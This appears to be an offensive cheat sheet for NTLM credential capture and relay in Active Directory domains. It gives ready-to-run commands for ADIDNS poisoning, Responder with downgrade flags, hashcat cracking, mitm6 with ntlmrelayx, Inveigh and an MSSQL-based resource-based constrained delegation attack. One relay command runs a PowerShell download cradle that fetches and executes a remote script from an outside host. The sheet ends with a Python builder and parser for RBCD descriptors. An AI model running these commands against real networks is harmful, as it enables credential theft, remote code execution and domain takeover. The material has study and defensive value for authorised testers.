Hash | Hashcat mode | Attack method |
---|---|---|
LM | 3000 | crack / pass the hash |
NTLM (NT hash) | 1000 | crack / pass the hash |
NTLMv1 (Net-NTLMv1) | 5500 | crack / relay |
NTLMv2 (Net-NTLMv2) | 5600 | crack / relay |
LM and NT hashes are stored credentials, so they can be passed directly. Net-NTLMv1/v2 are challenge/response values captured on the wire: they are bound to one server challenge, so they can only be relayed (while the connection is live) or cracked back to the password, never passed.
Abusing ADIDNS to redirect traffic to the attacker
#Add a wildcard (*) record to ADIDNS so that every name the zone cannot resolve points at the attacker machine; the resulting SMB/HTTP authentications can then be captured or relayed. By default any authenticated domain user may create DNS nodes in the zone.
Import-Module ./Powermad.ps1
New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose
#Loosen the ACL on the new node so it can be modified or removed later from another account (the creating account owns the node)
Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
Capturing hashes using Responder and cracking them
#Find the interface that routes to the target network (see the route table)
ip route get 10.10.10.10
#Start Responder on that interface
sudo responder -I tun0 -v
#Start Responder with WPAD enabled (-w), force WPAD authentication (-F) and fall back to basic auth (-b); --lm and --disable-ess downgrade clients to NTLMv1 without ESS, which crack with -m 5500 instead of 5600
python3 Responder.py -I ens160 -wFb -v --lm --disable-ess
#Crack captured NTLMv2 responses with hashcat (mode 5600), a wordlist and a rule set
hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force
mitm6 & ntlmrelayx
#Start mitm6: it answers DHCPv6 and hands out the attacker as IPv6 DNS server to hosts in the domain
sudo mitm6 -d victim.domain
#Start ntlmrelayx: serve a WPAD file pointing at the attacker and relay the resulting authentications to the target. Add -6 so it also listens on IPv6, which is where mitm6 victims connect from.
ntlmrelayx.py -6 -wh Attacker_IP -t smb://VICTIM_IP/ -i
NTLM relay of ADWS (WCF) connections
This attack only works when the victim itself opens an ADWS connection (TCP 9389) to a host you control, for example a script that names the attacker as -Server; it relies on a client being pointed at you, not on a coercion primitive. ntlmrelayx then relays the NTLM authentication carried inside the WCF stream to another target.
#Start ntlmrelayx with only the WCF listener, relaying to the target's RPC interface (task scheduler) to run a command
ntlmrelayx.py --no-smb-server --no-http-server -t rpc://TARGET_IP -c "echo a > c:\test"
#Simulate the vulnerable behaviour on the victim: an ADWS query that names the attacker as the server
Get-ADUser -Filter * -Server <pentester_machine>
#To capture and inspect the traffic in Wireshark instead of relaying it, forward port 9389 to the real DC
socat TCP-LISTEN:9389,fork,reuseaddr TCP:DC_IP:9389
Relaying using ntlmrelayx
# -wh: host serving the WPAD file (the attacker's IP)
# -t: target (you cannot relay credentials back to the host they came from; SMB reflection is blocked on patched systems)
# -i: open an interactive SMB client shell, exposed on a local TCP port printed in the output
# -l: directory in which to store the collected loot (dumped hashes, enumeration output)
# -c: command to execute on the target
# -e: binary to upload and execute on the target
When the relayed account is a local administrator on the target, ntlmrelayx dumps the SAM hashes automatically, so watch the output for them. Impacket 0.9.23-dev had problems with ntlmrelayx; use a stable release instead.
sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support
Useful commands
#Relay, save loot to ./loot, open the interactive shell and run a PowerShell download cradle on the target
sudo proxychains ntlmrelayx.py -t smb://10.10.10.10 -l loot -i -smb2support -c "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.102:8000/powerrev.ps1')"
#Relay only a specific user's authentication to a specific target (other users are ignored)
sudo proxychains ntlmrelayx.py -t smb://USERNAME@192.168.2.1 -smb2support
Inveigh
Inveigh-Relay only relays HTTP/HTTPS/proxy authentication to SMB (it does not accept inbound SMB authentication), so prefer ntlmrelayx when you need SMB-to-SMB relay.
Import-Module .\Inveigh.ps1
#Start ADIDNS abuse (Combo mode injects ADIDNS records for names seen in unanswered LLMNR/NBNS requests)
Invoke-Inveigh -ConsoleOutput Y -ADIDNS Combo
#Use explicit credentials for the ADIDNS write, naming the domain and the DC to write to
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)
Invoke-Inveigh -ConsoleOutput Y -ADIDNS Combo -ADIDNSCredential $Cred -ADIDNSDomain steins.local -ADIDNSDomainController 192.168.2.10
#Same without explicit credentials (the write runs as the current user)
Invoke-Inveigh -ConsoleOutput Y -ADIDNS Combo -ADIDNSDomain steins.local -ADIDNSDomainController 192.168.2.10
#Capture hashes on the target, with the DNS spoofer enabled
Invoke-Inveigh -ConsoleOutput Y -DNS Y
#Crack the NTLMv2 responses captured by Inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
#If a hash does not crack, relay it instead with Inveigh-Relay (HTTP/proxy authentication relayed to SMB on the target)
Invoke-InveighRelay -ConsoleOutput Y -Target 192.168.21.155 -ShowHelp N -StatusOutput N -Command "powershell.exe -c whoami"
Resource-based constrained delegation attack on MSSQL Server
#Add a DNS record pointing at the attacker machine (Powermad)
Invoke-DNSUpdate -DNSType A -DNSName shit -DNSData 10.10.10.10
#Run xp_dirtree on the SQL server: the SQL service account authenticates to the attacker's UNC path over SMB
SQLCMD -S SERVER\INSTANCE -Q "exec master.dbo.xp_dirtree '\\shit\a'" -U Admin -P password
#Relay that authentication to LDAP and write msDS-AllowedToActOnBehalfOfOtherIdentity on the SQL server's computer object (server$) so that Other_User can impersonate users to it. This needs the SQL service to run as the machine account (or a virtual account) and LDAP signing not to be enforced on the DC.
proxychains python rbcd_relay.py SQLServer_IP steins.local server$ Other_User
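What rbcd_relay.py ultimately writes is a security descriptor stored in the computer object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The following Python is an added example, not the tool's code nor anything from the original page: it builds that descriptor for a trustee SID in the shape the Impacket-based RBCD tooling uses (BUILTIN\Administrators as owner, one ACCESS_ALLOWED_ACE with mask 0xF01FF per trustee) and parses a descriptor back into trustee SIDs, which is also how you audit a domain for RBCD backdoors after a pentest. The SID S-1-5-21-1-2-3-1105 is a placeholder; the parser handles only the plain (non-object) ACE type these tools write.

```python
"""Build and audit the RBCD security descriptor. Added example, not rbcd_relay.py's code."""
import base64
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 4
RBCD_ACE_MASK = 0xF01FF       # 983551, the mask the Impacket-based RBCD tooling writes
OWNER_SID = "S-1-5-32-544"    # BUILTIN\Administrators, set as owner by the same tooling


def sid_to_bytes(sid: str) -> bytes:
    """Textual SID -> binary SID (revision, sub-authority count, 48-bit big-endian authority, LE subs)."""
    parts = sid.split("-")
    if parts[0].upper() != "S" or len(parts) < 3:
        raise ValueError("bad SID: %s" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf: bytes, off: int = 0):
    """Binary SID at buf[off:] -> (text, length in bytes)."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    text = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return text, 8 + 4 * count


def build_rbcd_sd(trustee_sids) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR: header, owner SID, then a DACL with one allow ACE per trustee."""
    aces = b""
    for sid in trustee_sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), RBCD_ACE_MASK) + sid_b
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(trustee_sids), 0) + aces
    owner = sid_to_bytes(OWNER_SID)
    header_len = 20                       # Revision, Sbz1, Control, OffsetOwner/Group/Sacl/Dacl
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         header_len, 0, 0, header_len + len(owner))
    return header + owner + acl


def parse_sd(sd: bytes) -> dict:
    """Walk a self-relative descriptor and list the SIDs granted by ACCESS_ALLOWED ACEs in the DACL."""
    _rev, _sbz, control, off_owner, _off_group, _off_sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    owner = bytes_to_sid(sd, off_owner)[0] if off_owner else None
    trustees = []
    if control & SE_DACL_PRESENT and off_dacl:
        _acl_rev, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
        pos = off_dacl + 8
        for _ in range(ace_count):
            ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
            if ace_type == ACCESS_ALLOWED_ACE_TYPE:
                trustees.append((bytes_to_sid(sd, pos + 8)[0], mask))
            pos += ace_size                # ace_size also skips ACE types we do not decode
    return {"owner": owner, "control": control, "trustees": trustees}


def trustees_from_base64(value: str):
    """Audit helper: feed it the base64 attribute value as exported by an LDAP dump or PowerShell."""
    return [sid for sid, _mask in parse_sd(base64.b64decode(value))["trustees"]]


if __name__ == "__main__":
    sd = build_rbcd_sd(["S-1-5-21-1-2-3-1105"])   # placeholder SID of the attacker-controlled account
    print(len(sd), "bytes;", parse_sd(sd))
    print(trustees_from_base64(base64.b64encode(sd).decode()))
```

For the audit side, pull the attribute for every computer (and the rare user) object and run trustees_from_base64 on it: any trustee that is not a known front-end service account is an RBCD path someone left behind.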